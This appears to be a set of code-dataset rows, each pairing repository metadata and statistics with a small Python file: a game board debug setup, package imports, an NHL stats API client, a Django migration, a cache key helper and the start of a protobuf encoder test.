| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
ab040eb7dd3252c6997195933e5fd19ac912f428
| 1,557
|
py
|
Python
|
DebugMode.py
|
DanielPri/XrudderAI
|
5c3e690c24511c05a205387431896cb5880e4b33
|
[
"MIT"
] | null | null | null |
DebugMode.py
|
DanielPri/XrudderAI
|
5c3e690c24511c05a205387431896cb5880e4b33
|
[
"MIT"
] | null | null | null |
DebugMode.py
|
DanielPri/XrudderAI
|
5c3e690c24511c05a205387431896cb5880e4b33
|
[
"MIT"
] | 1
|
2021-03-24T02:50:45.000Z
|
2021-03-24T02:50:45.000Z
|
from TileColor import TileColor
def set_board(board, p1, p2):
board.get_tile("A", 5).set_color(TileColor.WHITE)
board.get_tile("A", 3).set_color(TileColor.WHITE)
board.get_tile("B", 4).set_color(TileColor.WHITE)
board.get_tile("C", 1).set_color(TileColor.WHITE)
board.get_tile("C", 3).set_color(TileColor.WHITE)
board.get_tile("D", 5).set_color(TileColor.WHITE)
board.get_tile("F", 5).set_color(TileColor.WHITE)
board.get_tile("G", 5).set_color(TileColor.WHITE)
board.get_tile("J", 1).set_color(TileColor.WHITE)
board.get_tile("J", 3).set_color(TileColor.WHITE)
board.get_tile("K", 2).set_color(TileColor.WHITE)
board.get_tile("L", 1).set_color(TileColor.WHITE)
p1.played_pieces = ["A5", "A3", "B4", "C1", "C3", "D5", "F5", "G5", "J1", "J3", "K2", "L1"]
board.get_tile("A", 2).set_color(TileColor.BLACK)
board.get_tile("C", 2).set_color(TileColor.BLACK)
board.get_tile("D", 4).set_color(TileColor.BLACK)
board.get_tile("D", 6).set_color(TileColor.BLACK)
board.get_tile("E", 5).set_color(TileColor.BLACK)
board.get_tile("F", 4).set_color(TileColor.BLACK)
board.get_tile("F", 6).set_color(TileColor.BLACK)
board.get_tile("G", 4).set_color(TileColor.BLACK)
board.get_tile("G", 6).set_color(TileColor.BLACK)
board.get_tile("H", 5).set_color(TileColor.BLACK)
board.get_tile("J", 2).set_color(TileColor.BLACK)
board.get_tile("I", 4).set_color(TileColor.BLACK)
p2.played_pieces = ["A2", "C2", "D4", "D6", "E5", "F4", "F6", "G4", "G6", "H5", "J2", "I4"]
| 43.25
| 95
| 0.667309
| 256
| 1,557
| 3.859375
| 0.222656
| 0.194332
| 0.291498
| 0.267206
| 0.834008
| 0.787449
| 0.787449
| 0.753036
| 0
| 0
| 0
| 0.038179
| 0.125241
| 1,557
| 35
| 96
| 44.485714
| 0.687225
| 0
| 0
| 0
| 0
| 0
| 0.046302
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.035714
| false
| 0
| 0.035714
| 0
| 0.071429
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
db58e9775cd7928a4dbea941aa73c24dfa9b47ad
| 29
|
py
|
Python
|
torch_tools/data/augment/__init__.py
|
gregunz/TorchTools
|
19a33f2e4cd38f86b74bd732949516df66f9e24f
|
[
"MIT"
] | null | null | null |
torch_tools/data/augment/__init__.py
|
gregunz/TorchTools
|
19a33f2e4cd38f86b74bd732949516df66f9e24f
|
[
"MIT"
] | null | null | null |
torch_tools/data/augment/__init__.py
|
gregunz/TorchTools
|
19a33f2e4cd38f86b74bd732949516df66f9e24f
|
[
"MIT"
] | null | null | null |
from .randaug import RandAug
| 14.5
| 28
| 0.827586
| 4
| 29
| 6
| 0.75
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.137931
| 29
| 1
| 29
| 29
| 0.96
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
dbc29cddb20c2520df94629a12739bc825187dbb
| 260
|
py
|
Python
|
rl/oracles/__init__.py
|
gtrll/librl
|
39709c3e485e232865b3e08b7211cd9d871c666a
|
[
"MIT"
] | 5
|
2020-07-14T23:01:53.000Z
|
2020-12-09T08:11:29.000Z
|
rl/oracles/__init__.py
|
chinganc/mamba
|
e8adf0cf91660aed2c025508137a14f9d062248c
|
[
"MIT"
] | 1
|
2022-03-27T04:43:31.000Z
|
2022-03-27T04:43:31.000Z
|
rl/oracles/__init__.py
|
chinganc/mamba
|
e8adf0cf91660aed2c025508137a14f9d062248c
|
[
"MIT"
] | 4
|
2020-08-05T14:13:26.000Z
|
2022-02-26T00:46:03.000Z
|
from rl.oracles.oracle import rlOracle
#from rl.oracles.reinforcement_oracles import tfPolicyGradient
#from rl.oracles.simulation_oracles import SimulationOracle
#from rl.oracles.meta_oracles import LazyOracle, AdversarialOracle, AggregatedOracle, DummyOracle
| 52
| 97
| 0.873077
| 30
| 260
| 7.466667
| 0.5
| 0.107143
| 0.232143
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.073077
| 260
| 4
| 98
| 65
| 0.929461
| 0.826923
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
91ebd2178e03285f842f6410e1a428a8cd71d30c
| 2,285
|
py
|
Python
|
hockeygamebot/nhlapi/api.py
|
mattdonders/DevilsGoalBot
|
4409bea8d997c2f693d4c2e9c129899fca380640
|
[
"MIT"
] | null | null | null |
hockeygamebot/nhlapi/api.py
|
mattdonders/DevilsGoalBot
|
4409bea8d997c2f693d4c2e9c129899fca380640
|
[
"MIT"
] | null | null | null |
hockeygamebot/nhlapi/api.py
|
mattdonders/DevilsGoalBot
|
4409bea8d997c2f693d4c2e9c129899fca380640
|
[
"MIT"
] | null | null | null |
"""
Single module to call the NHL API.
"""
import logging
import requests
from requests.adapters import HTTPAdapter
from requests.exceptions import ConnectionError, RequestException
from hockeygamebot.helpers import arguments, utils
from hockeygamebot.models.sessions import SessionFactory
def nhl_api(endpoint):
urls = utils.load_urls()
api_base = urls["endpoints"]["nhl_endpoint"]
sf = SessionFactory()
session = sf.get()
retries = HTTPAdapter(max_retries=3)
session.mount("https://", retries)
session.mount("http://", retries)
# Fix issues with leading slash on an endpoint call
url = f"{api_base}{endpoint}" if endpoint[0] == "/" else f"{api_base}/{endpoint}"
try:
logging.info("Sending Stats API Request - %s", url)
response = session.get(url, timeout=5)
return response
except ConnectionError as ce:
logging.error(ce)
return None
except RequestException as re:
logging.error(re)
return None
def nhl_rpt(endpoint):
urls = utils.load_urls()
api_base = urls["endpoints"]["nhl_rpt_base"]
sf = SessionFactory()
session = sf.get()
retries = HTTPAdapter(max_retries=3)
session.mount("https://", retries)
session.mount("http://", retries)
url = f"{api_base}{endpoint}"
try:
logging.info("Sending Report API Request - %s", url)
response = session.get(url, timeout=5)
return response
except ConnectionError as ce:
logging.error(ce)
return None
except RequestException as re:
logging.error(re)
return None
def nhl_score_rpt(endpoint):
urls = utils.load_urls()
api_base = urls["endpoints"]["nhl_score_rpt_base"]
sf = SessionFactory()
session = sf.get()
retries = HTTPAdapter(max_retries=3)
session.mount("https://", retries)
session.mount("http://", retries)
url = f"{api_base}{endpoint}"
try:
logging.info("Sending Score Report Request - %s", url)
response = session.get(url, timeout=5)
return response if response.status_code == 200 else None
except ConnectionError as ce:
logging.error(ce)
return None
except RequestException as re:
logging.error(re)
return None
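# A minimal usage sketch (not part of the original file): the endpoint
# path below is illustrative only, and the None check mirrors the
# error handling above.
if __name__ == "__main__":
    response = nhl_api("/teams")  # hypothetical endpoint path
    if response is not None:
        print(response.status_code)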
| 25.674157
| 85
| 0.653829
| 278
| 2,285
| 5.28777
| 0.258993
| 0.033333
| 0.021769
| 0.043537
| 0.740816
| 0.727891
| 0.727891
| 0.727891
| 0.702721
| 0.702721
| 0
| 0.005711
| 0.233698
| 2,285
| 88
| 86
| 25.965909
| 0.833809
| 0.037199
| 0
| 0.730159
| 0
| 0
| 0.132299
| 0.00958
| 0
| 0
| 0
| 0
| 0
| 1
| 0.047619
| false
| 0
| 0.095238
| 0
| 0.285714
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
37f51c524d57829292b9418d70c37dc633c49911
| 135
|
py
|
Python
|
oktopus/__init__.py
|
exowanderer/oktopus
|
efe394a433be14d2ba3bec679b8667b700b7f7b9
|
[
"MIT"
] | 17
|
2017-09-30T19:25:24.000Z
|
2022-03-29T16:58:54.000Z
|
oktopus/__init__.py
|
exowanderer/oktopus
|
efe394a433be14d2ba3bec679b8667b700b7f7b9
|
[
"MIT"
] | 8
|
2017-10-17T06:01:31.000Z
|
2020-03-31T08:54:09.000Z
|
oktopus/__init__.py
|
exowanderer/oktopus
|
efe394a433be14d2ba3bec679b8667b700b7f7b9
|
[
"MIT"
] | 5
|
2017-09-30T16:27:33.000Z
|
2020-06-28T07:47:33.000Z
|
import os
from .version import __version__
from .loss import *
from .prior import *
from .likelihood import *
from .posterior import *
| 19.285714
| 32
| 0.77037
| 18
| 135
| 5.555556
| 0.444444
| 0.3
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.162963
| 135
| 6
| 33
| 22.5
| 0.884956
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
530ad85c3e36411edd1322e52c77c258c15d2a7e
| 70
|
py
|
Python
|
reshade/utils/__init__.py
|
jamesjiang52/Reshade
|
ddc87424c50030b4606c4eb5ec61b4be1d4cad98
|
[
"MIT"
] | null | null | null |
reshade/utils/__init__.py
|
jamesjiang52/Reshade
|
ddc87424c50030b4606c4eb5ec61b4be1d4cad98
|
[
"MIT"
] | null | null | null |
reshade/utils/__init__.py
|
jamesjiang52/Reshade
|
ddc87424c50030b4606c4eb5ec61b4be1d4cad98
|
[
"MIT"
] | null | null | null |
from .flatten import *
from .validate import *
from .zeropad import *
| 17.5
| 23
| 0.742857
| 9
| 70
| 5.777778
| 0.555556
| 0.384615
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.171429
| 70
| 3
| 24
| 23.333333
| 0.896552
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
530b4efd36f681ad761a891d27836573d1a568a1
| 47
|
py
|
Python
|
terrascript/vault/d.py
|
vutsalsinghal/python-terrascript
|
3b9fb5ad77453d330fb0cd03524154a342c5d5dc
|
[
"BSD-2-Clause"
] | null | null | null |
terrascript/vault/d.py
|
vutsalsinghal/python-terrascript
|
3b9fb5ad77453d330fb0cd03524154a342c5d5dc
|
[
"BSD-2-Clause"
] | null | null | null |
terrascript/vault/d.py
|
vutsalsinghal/python-terrascript
|
3b9fb5ad77453d330fb0cd03524154a342c5d5dc
|
[
"BSD-2-Clause"
] | null | null | null |
# terrascript/vault/d.py
import terrascript
| 9.4
| 25
| 0.765957
| 6
| 47
| 6
| 0.833333
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.148936
| 47
| 4
| 26
| 11.75
| 0.9
| 0.468085
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
531ae23404887b1f38f72715aeef4d7ca4695123
| 34
|
py
|
Python
|
umetna_inteligenca.py
|
AnzeMarinko/dostava
|
a10d3e5ab3c8084c385b9bfab7397970bae4a7a1
|
[
"MIT"
] | null | null | null |
umetna_inteligenca.py
|
AnzeMarinko/dostava
|
a10d3e5ab3c8084c385b9bfab7397970bae4a7a1
|
[
"MIT"
] | null | null | null |
umetna_inteligenca.py
|
AnzeMarinko/dostava
|
a10d3e5ab3c8084c385b9bfab7397970bae4a7a1
|
[
"MIT"
] | null | null | null |
import podatkovne_strukture as ps
| 17
| 33
| 0.882353
| 5
| 34
| 5.8
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.117647
| 34
| 1
| 34
| 34
| 0.966667
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
5322863a2eb3cc2329db07970b4d7d4a6ffb2c43
| 27
|
py
|
Python
|
hello.py
|
athira-vs/HelloWorld
|
7d21969479a10f560983d76e5d8fc983b65044a5
|
[
"MIT"
] | null | null | null |
hello.py
|
athira-vs/HelloWorld
|
7d21969479a10f560983d76e5d8fc983b65044a5
|
[
"MIT"
] | null | null | null |
hello.py
|
athira-vs/HelloWorld
|
7d21969479a10f560983d76e5d8fc983b65044a5
|
[
"MIT"
] | null | null | null |
print("\n\n\tHello World")
| 13.5
| 26
| 0.666667
| 5
| 27
| 3.6
| 0.8
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.074074
| 27
| 1
| 27
| 27
| 0.72
| 0
| 0
| 0
| 0
| 0
| 0.62963
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
|
0
| 6
|
5337870afd7689004241845713c825691d9fda0e
| 170
|
py
|
Python
|
basiclive/utils/cache.py
|
znarthur/basic-live
|
79c194311de05af2e1bb21d1bc8c6c14dda356d0
|
[
"BSD-3-Clause"
] | null | null | null |
basiclive/utils/cache.py
|
znarthur/basic-live
|
79c194311de05af2e1bb21d1bc8c6c14dda356d0
|
[
"BSD-3-Clause"
] | 1
|
2020-12-03T15:27:09.000Z
|
2020-12-03T15:27:09.000Z
|
basiclive/utils/cache.py
|
znarthur/basic-live
|
79c194311de05af2e1bb21d1bc8c6c14dda356d0
|
[
"BSD-3-Clause"
] | 1
|
2021-09-28T21:06:09.000Z
|
2021-09-28T21:06:09.000Z
|
import hashlib
def make_key(key, key_prefix, version):
hashed_key = hashlib.md5(key.encode("utf-8")).hexdigest()
return f'{key_prefix}:{version}:{hashed_key}'
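# A minimal usage sketch (not part of the original file): the signature
# appears to match Django's KEY_FUNCTION hook, producing fixed-length
# keys no matter how long the raw key is.
if __name__ == "__main__":
    print(make_key("some:very/long cache key", "myapp", 1))
    # -> myapp:1:<32-character md5 hex digest>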
| 21.25
| 61
| 0.705882
| 25
| 170
| 4.6
| 0.6
| 0.104348
| 0.278261
| 0.382609
| 0.434783
| 0
| 0
| 0
| 0
| 0
| 0
| 0.013514
| 0.129412
| 170
| 7
| 62
| 24.285714
| 0.763514
| 0
| 0
| 0
| 0
| 0
| 0.236686
| 0.207101
| 0
| 0
| 0
| 0
| 0
| 1
| 0.25
| false
| 0
| 0.25
| 0
| 0.75
| 0
| 1
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 0
|
0
| 6
|
534a0a1d5d172e6d82d10954aa6d6ae8e29e7e48
| 218
|
py
|
Python
|
bucles/for.py
|
charlesgmont/basico-python
|
cbffdcc8c469f3401586149c500ecc792b8ff587
|
[
"MIT"
] | null | null | null |
bucles/for.py
|
charlesgmont/basico-python
|
cbffdcc8c469f3401586149c500ecc792b8ff587
|
[
"MIT"
] | null | null | null |
bucles/for.py
|
charlesgmont/basico-python
|
cbffdcc8c469f3401586149c500ecc792b8ff587
|
[
"MIT"
] | null | null | null |
#contador = 1
#print(contador)
#while contador < 1000:
##contador = contador + 1
#contador =+ 1
#print(contador)
#a = list(range(1000))
#print(a)
#for contador in range(1, 1001):
#print(contador)
| 13.625
| 32
| 0.614679
| 28
| 218
| 4.785714
| 0.392857
| 0.201493
| 0.208955
| 0.328358
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.094675
| 0.224771
| 218
| 15
| 33
| 14.533333
| 0.698225
| 0.802752
| 0
| null | 0
| null | 0
| 0
| null | 0
| 0
| 0
| null | 1
| null | true
| 0
| 0
| null | null | null | 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
729c46ac8494e4ada5705185ee361262048a548d
| 46
|
py
|
Python
|
alkaid/net/__init__.py
|
Renovamen/alkaid
|
78bb19c3d18856234dec9444235b749c6006655f
|
[
"MIT"
] | 1
|
2021-06-04T10:33:44.000Z
|
2021-06-04T10:33:44.000Z
|
alkaid/net/__init__.py
|
Renovamen/alkaid
|
78bb19c3d18856234dec9444235b749c6006655f
|
[
"MIT"
] | null | null | null |
alkaid/net/__init__.py
|
Renovamen/alkaid
|
78bb19c3d18856234dec9444235b749c6006655f
|
[
"MIT"
] | null | null | null |
from .backbone import MLP
from .qnet import *
| 15.333333
| 25
| 0.76087
| 7
| 46
| 5
| 0.714286
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.173913
| 46
| 2
| 26
| 23
| 0.921053
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
72c20dda30d6214f2c1f3772050400a89e8545ad
| 314
|
py
|
Python
|
am/scraper/interpreters/__init__.py
|
access-missouri/am-django-project
|
2457b8089900c61c73000c1d7479b7a72f6d1855
|
[
"BSD-2-Clause"
] | 4
|
2018-05-01T20:31:49.000Z
|
2021-12-20T19:30:40.000Z
|
am/scraper/interpreters/__init__.py
|
access-missouri/am-django-project
|
2457b8089900c61c73000c1d7479b7a72f6d1855
|
[
"BSD-2-Clause"
] | 22
|
2017-04-13T15:02:09.000Z
|
2021-02-02T21:48:41.000Z
|
am/scraper/interpreters/__init__.py
|
access-missouri/am-django-project
|
2457b8089900c61c73000c1d7479b7a72f6d1855
|
[
"BSD-2-Clause"
] | 1
|
2018-07-02T20:08:43.000Z
|
2018-07-02T20:08:43.000Z
|
from .base import BaseInterpreter
from .HouseBillListInterpreter import HouseBillListInterpreter
from .HouseBillPageActionsInterpreter import HouseBillPageActionsInterpreter
from .HouseBillPageContentInterpreter import HouseBillPageContentInterpreter
from .HouseBillPageInterpreter import HouseBillPageInterpreter
| 52.333333
| 76
| 0.920382
| 20
| 314
| 14.45
| 0.4
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.063694
| 314
| 5
| 77
| 62.8
| 0.982993
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
72fbab44505c9c29043f1b27470b1b80ea80886e
| 85
|
py
|
Python
|
commands/__init__.py
|
TAG-Epic/eventful
|
5557906113882f1dc4759aeb96f344fb99853248
|
[
"MIT"
] | null | null | null |
commands/__init__.py
|
TAG-Epic/eventful
|
5557906113882f1dc4759aeb96f344fb99853248
|
[
"MIT"
] | null | null | null |
commands/__init__.py
|
TAG-Epic/eventful
|
5557906113882f1dc4759aeb96f344fb99853248
|
[
"MIT"
] | null | null | null |
"""
Created by Epic at 9/25/20
"""
from .help_command import execute as help_command
| 17
| 49
| 0.741176
| 15
| 85
| 4.066667
| 0.866667
| 0.360656
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.069444
| 0.152941
| 85
| 4
| 50
| 21.25
| 0.777778
| 0.305882
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
72ffd77bb755bcbe0bb08c11f7e39c0ce186b3b6
| 999
|
py
|
Python
|
zerver/migrations/0362_send_typing_notifications_user_setting.py
|
dumpmemory/zulip
|
496273ddbc567330a0022699d6d6eb5c646e5da5
|
[
"Apache-2.0"
] | 17,004
|
2015-09-25T18:27:24.000Z
|
2022-03-31T22:02:32.000Z
|
zerver/migrations/0362_send_typing_notifications_user_setting.py
|
dumpmemory/zulip
|
496273ddbc567330a0022699d6d6eb5c646e5da5
|
[
"Apache-2.0"
] | 20,344
|
2015-09-25T19:02:42.000Z
|
2022-03-31T23:54:40.000Z
|
zerver/migrations/0362_send_typing_notifications_user_setting.py
|
dumpmemory/zulip
|
496273ddbc567330a0022699d6d6eb5c646e5da5
|
[
"Apache-2.0"
] | 7,271
|
2015-09-25T18:48:39.000Z
|
2022-03-31T21:06:11.000Z
|
# Generated by Django 3.2.7 on 2021-10-03 07:09
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
("zerver", "0361_realm_create_web_public_stream_policy"),
]
operations = [
migrations.AddField(
model_name="realmuserdefault",
name="send_private_typing_notifications",
field=models.BooleanField(default=True),
),
migrations.AddField(
model_name="realmuserdefault",
name="send_stream_typing_notifications",
field=models.BooleanField(default=True),
),
migrations.AddField(
model_name="userprofile",
name="send_private_typing_notifications",
field=models.BooleanField(default=True),
),
migrations.AddField(
model_name="userprofile",
name="send_stream_typing_notifications",
field=models.BooleanField(default=True),
),
]
| 29.382353
| 65
| 0.61962
| 92
| 999
| 6.48913
| 0.456522
| 0.120603
| 0.154104
| 0.180905
| 0.723618
| 0.723618
| 0.723618
| 0.624791
| 0.624791
| 0.624791
| 0
| 0.026499
| 0.282282
| 999
| 33
| 66
| 30.272727
| 0.806137
| 0.045045
| 0
| 0.740741
| 1
| 0
| 0.243697
| 0.180672
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.037037
| 0
| 0.148148
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 0
| 1
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
f40e3095a404b5115367b90810ec891921967a0b
| 171
|
py
|
Python
|
hubspot/cms/performance/api/__init__.py
|
Ronfer/hubspot-api-python
|
1c87274ecbba4aa3c7728f890ccc6e77b2b6d2e4
|
[
"Apache-2.0"
] | 117
|
2020-04-06T08:22:53.000Z
|
2022-03-18T03:41:29.000Z
|
hubspot/cms/performance/api/__init__.py
|
Ronfer/hubspot-api-python
|
1c87274ecbba4aa3c7728f890ccc6e77b2b6d2e4
|
[
"Apache-2.0"
] | 62
|
2020-04-06T16:21:06.000Z
|
2022-03-17T16:50:44.000Z
|
hubspot/cms/performance/api/__init__.py
|
Ronfer/hubspot-api-python
|
1c87274ecbba4aa3c7728f890ccc6e77b2b6d2e4
|
[
"Apache-2.0"
] | 45
|
2020-04-06T16:13:52.000Z
|
2022-03-30T21:33:17.000Z
|
from __future__ import absolute_import
# flake8: noqa
# import apis into api package
from hubspot.cms.performance.api.public_performance_api import PublicPerformanceApi
| 24.428571
| 83
| 0.847953
| 22
| 171
| 6.272727
| 0.681818
| 0.202899
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.006579
| 0.111111
| 171
| 6
| 84
| 28.5
| 0.901316
| 0.239766
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
f42e4bbead554261f1dc093ad587b98fe804f7fc
| 5,298
|
py
|
Python
|
odps/tunnel/tests/test_pb.py
|
wjsi/aliyun-odps-python-sdk
|
8b064340e4376def201b8d8fdc0c2fa021aae9be
|
[
"Apache-2.0"
] | 412
|
2015-11-01T09:27:52.000Z
|
2022-03-26T05:04:03.000Z
|
odps/tunnel/tests/test_pb.py
|
wjsi/aliyun-odps-python-sdk
|
8b064340e4376def201b8d8fdc0c2fa021aae9be
|
[
"Apache-2.0"
] | 168
|
2015-11-16T09:46:39.000Z
|
2022-03-17T06:35:26.000Z
|
odps/tunnel/tests/test_pb.py
|
wjsi/aliyun-odps-python-sdk
|
8b064340e4376def201b8d8fdc0c2fa021aae9be
|
[
"Apache-2.0"
] | 103
|
2015-12-01T08:10:09.000Z
|
2022-02-21T12:46:35.000Z
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Copyright 1999-2017 Alibaba Group Holding Ltd.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import io
import warnings
from odps.tests.core import TestBase, to_str
from odps.compat import unittest
from odps.tunnel.pb.wire_format import *
from odps.utils import to_binary
class Test(TestBase):
def testPyEncodeAndDecode(self):
from odps.tunnel.pb.encoder import Encoder
from odps.tunnel.pb.decoder import Decoder
encoder = Encoder()
encoder.append_tag(0, WIRETYPE_VARINT)
encoder.append_int32(2 ** 20)
encoder.append_tag(1, WIRETYPE_VARINT)
encoder.append_sint64(-2 ** 40)
encoder.append_tag(2, WIRETYPE_LENGTH_DELIMITED)
encoder.append_string(to_binary("hello"))
encoder.append_tag(3, WIRETYPE_VARINT)
encoder.append_bool(True)
encoder.append_tag(4, WIRETYPE_FIXED64)
encoder.append_float(3.14)
encoder.append_double(0.31415926)
encoder.append_tag(5, WIRETYPE_VARINT)
encoder.append_uint32(2 ** 30)
